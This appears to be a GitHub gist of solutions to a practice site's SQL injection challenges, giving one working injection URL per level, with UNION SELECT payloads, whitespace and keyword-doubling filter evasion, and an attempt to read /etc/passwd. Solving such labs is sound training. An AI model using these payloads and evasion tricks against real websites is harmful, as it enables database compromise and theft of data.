Skip to content

Instantly share code, notes, and snippets.

@ciel334288
Last active May 12, 2021 15:01
Show Gist options
  • Select an option

  • Save ciel334288/d7dcc98dec3514e3cbdb7bb2d07852da to your computer and use it in GitHub Desktop.

Select an option

Save ciel334288/d7dcc98dec3514e3cbdb7bb2d07852da to your computer and use it in GitHub Desktop.
Zixem SQLi Challenges

SQLi Challenges from zixem.altervista.org

Level 1 Super Easy

http://www.zixem.altervista.org/SQLi/level1.php?id=2 or 2=3 union select 1,concat(database(),user(),version()),3--

Level 2 Easy

http://www.zixem.altervista.org/SQLi/level2.php?showprofile=1' or 1=3 union select user(),database(),version(),4--'

Level 3 Easy

http://www.zixem.altervista.org/SQLi/level3.php?item=2' or 1=2 unionon select database(),version(),user(),4--'

Level 4 Normal

http://www.zixem.altervista.org/SQLi/level4.php?ebookid=' or 1=3 union select 1,version(),user(),database(),5 --'

Level 6 Experienced Blind Injection

http://www.zixem.altervista.org/SQLi/blind_lvl6.php?serial=10 and 1=2 union select id,teacher,teacher_age,price from teachers where id=11--

Level 7 Medium

http://www.zixem.altervista.org/SQLi/level7.php?id=2 or 1=2 union select 1,concat(user(),version(),database()),3#

Level 8 Hard

` /**/ - Comment %20 - URL encoded space %00 - Nullbyte %0d - \r (Carriage return) %0a - \n (Line feed) %09 - \t (Tab) `

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%0dand%0d1=2%0dunion%0dselselectect%0duser(),database(),3#

Level 10 PRO

http://www.zixem.altervista.org/SQLi/lvl9.php?id=1 or 1=2' union select "../etc/passwd",2--'

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment